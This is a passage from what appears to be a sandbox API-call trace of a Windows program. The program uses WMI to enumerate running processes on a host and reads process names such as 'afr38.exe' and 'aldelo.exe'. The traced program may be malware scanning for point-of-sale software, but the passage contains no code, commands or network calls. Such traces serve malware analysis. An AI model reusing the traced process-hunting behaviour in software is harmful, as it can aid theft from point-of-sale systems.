[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x563594c) returned 0x0 [0214.731] IMarshal:GetUnmarshalClass (in: This=0x563594c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.731] IUnknown:Release (This=0x563594c) returned 0x3 [0214.731] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.731] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.731] IUnknown:QueryInterface (in: This=0x5635948, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.731] IUnknown:Release (This=0x5635948) returned 0x2 [0214.731] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.731] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.732] IUnknown:QueryInterface (in: This=0x5635948, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5635948) returned 0x0 [0214.732] IUnknown:AddRef (This=0x5635948) returned 0x4 [0214.732] IUnknown:Release (This=0x5635948) returned 0x3 [0214.732] IUnknown:Release (This=0x5635948) returned 0x2 [0214.732] CoTaskMemFree (pv=0x56321a8) [0214.732] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.732] IUnknown:AddRef (This=0x5635948) returned 0x3 [0214.732] IWbemClassObject:Get (in: This=0x5635948, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.732] IWbemClassObject:Get (in: This=0x5635948, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2276\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.732] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2276\"") returned 0x66 [0214.732] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2276\"") returned 0x66 [0214.733] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.733] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.733] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.733] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.733] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56321a8) returned 0x0 [0214.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x56321a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.734] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56321a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5637d40) returned 0x0 [0214.734] WbemDefPath:IUnknown:Release (This=0x56321a8) returned 0x0 [0214.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5637d40) returned 0x0 [0214.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.734] WbemDefPath:IUnknown:AddRef (This=0x5637d40) returned 0x3 [0214.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56321b8) returned 0x0 [0214.734] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56321b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.734] WbemDefPath:IUnknown:Release (This=0x56321b8) returned 0x3 [0214.734] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.735] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.735] WbemDefPath:IUnknown:Release (This=0x5637d40) returned 0x2 [0214.735] WbemDefPath:IUnknown:Release (This=0x5637d40) returned 0x1 [0214.735] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.735] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637d40, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5637d40) returned 0x0 [0214.735] WbemDefPath:IUnknown:AddRef (This=0x5637d40) returned 0x3 [0214.735] WbemDefPath:IUnknown:Release (This=0x5637d40) returned 0x2 [0214.735] WbemDefPath:IWbemPath:SetText (This=0x5637d40, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2276\"") returned 0x0 [0214.735] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.735] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.735] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.735] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.735] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.735] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.735] IWbemClassObject:Get (in: This=0x5635948, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2698770*=0, plFlavor=0x2698774*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x2698770*=8, plFlavor=0x2698774*=0) returned 0x0 [0214.736] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0214.736] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0214.736] IWbemClassObject:Get (in: This=0x5635948, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2698770*=8, plFlavor=0x2698774*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x2698770*=8, plFlavor=0x2698774*=0) returned 0x0 [0214.736] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0214.736] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0214.736] CoTaskMemAlloc (cb=0x4) returned 0x56321e8 [0214.736] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56321e8, puReturned=0x267acc0 | out: apObjects=0x56321e8*=0x5635ae0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5635ae0) returned 0x0 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.737] IUnknown:AddRef (This=0x5635ae0) returned 0x3 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5635ae4) returned 0x0 [0214.737] IMarshal:GetUnmarshalClass (in: This=0x5635ae4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.737] IUnknown:Release (This=0x5635ae4) returned 0x3 [0214.737] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.737] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.737] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.737] IUnknown:Release (This=0x5635ae0) returned 0x2 [0214.738] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.738] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.738] IUnknown:QueryInterface (in: This=0x5635ae0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5635ae0) returned 0x0 [0214.738] IUnknown:AddRef (This=0x5635ae0) returned 0x4 [0214.738] IUnknown:Release (This=0x5635ae0) returned 0x3 [0214.738] IUnknown:Release (This=0x5635ae0) returned 0x2 [0214.738] CoTaskMemFree (pv=0x56321e8) [0214.738] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.738] IUnknown:AddRef (This=0x5635ae0) returned 0x3 [0214.738] IWbemClassObject:Get (in: This=0x5635ae0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.738] IWbemClassObject:Get (in: This=0x5635ae0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2256\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.738] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2256\"") returned 0x66 [0214.738] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2256\"") returned 0x66 [0214.738] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.739] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.739] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.739] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.739] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56321e8) returned 0x0 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x56321e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.740] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56321e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5637e20) returned 0x0 [0214.740] WbemDefPath:IUnknown:Release (This=0x56321e8) returned 0x0 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5637e20) returned 0x0 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.740] WbemDefPath:IUnknown:AddRef (This=0x5637e20) returned 0x3 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56321f8) returned 0x0 [0214.740] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56321f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.740] WbemDefPath:IUnknown:Release (This=0x56321f8) returned 0x3 [0214.740] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.740] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.741] WbemDefPath:IUnknown:Release (This=0x5637e20) returned 0x2 [0214.741] WbemDefPath:IUnknown:Release (This=0x5637e20) returned 0x1 [0214.741] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.741] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637e20, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5637e20) returned 0x0 [0214.741] WbemDefPath:IUnknown:AddRef (This=0x5637e20) returned 0x3 [0214.741] WbemDefPath:IUnknown:Release (This=0x5637e20) returned 0x2 [0214.741] WbemDefPath:IWbemPath:SetText (This=0x5637e20, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2256\"") returned 0x0 [0214.741] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.741] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.741] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.741] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.741] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.741] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.741] IWbemClassObject:Get (in: This=0x5635ae0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2698fd4*=0, plFlavor=0x2698fd8*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x2698fd4*=8, plFlavor=0x2698fd8*=0) returned 0x0 [0214.741] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0214.741] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0214.741] IWbemClassObject:Get (in: This=0x5635ae0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2698fd4*=8, plFlavor=0x2698fd8*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x2698fd4*=8, plFlavor=0x2698fd8*=0) returned 0x0 [0214.742] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0214.742] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0214.742] CoTaskMemAlloc (cb=0x4) returned 0x5632228 [0214.742] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632228, puReturned=0x267acc0 | out: apObjects=0x5632228*=0x5635c78, puReturned=0x267acc0*=0x1) returned 0x0 [0214.742] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5635c78) returned 0x0 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.743] IUnknown:AddRef 